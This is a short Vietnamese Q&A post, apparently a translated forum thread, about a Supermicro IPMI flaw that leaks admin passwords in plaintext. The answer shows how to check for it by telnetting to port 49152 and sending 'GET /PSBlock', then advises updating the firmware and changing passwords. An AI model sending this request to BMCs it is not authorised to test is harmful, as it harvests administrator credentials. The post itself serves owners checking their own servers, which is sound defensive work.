Tôi có một số máy chủ Supermicro đang chạy IPMI và như được mô tả trong blog này ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) có một lỗ hổng nghiêm trọng đối với lấy mật khẩu quản trị viên văn bản từ bất kỳ vị trí từ xa.
Làm thế nào để kiểm tra xem bo mạch chủ máy chủ của tôi có bị xâm nhập không?
Câu trả lời:
Chỉ cần telnet đến Địa chỉ IP IPMI trong cổng 49152 và thực hiện một yêu cầu GET cụ thể. Bạn sẽ nhận được người dùng và mật khẩu nếu bạn bị xâm phạm.
telnet server.example.com 49152
Sau khi kết nối yêu cầu GET /PSBlockvà xem kết quả, nó sẽ giống như thế này:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Câu trả lời:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Để giải quyết vấn đề này, hãy cập nhật firmware IPMI lên phiên bản mới nhất. Phần sụn dành riêng cho bộ điều khiển IPMI của bạn, vì vậy bạn sẽ nhận được chỉ định trong trang web Supermicro.
Sau đó, sau khi cập nhật firmware thay đổi mật khẩu của bạn .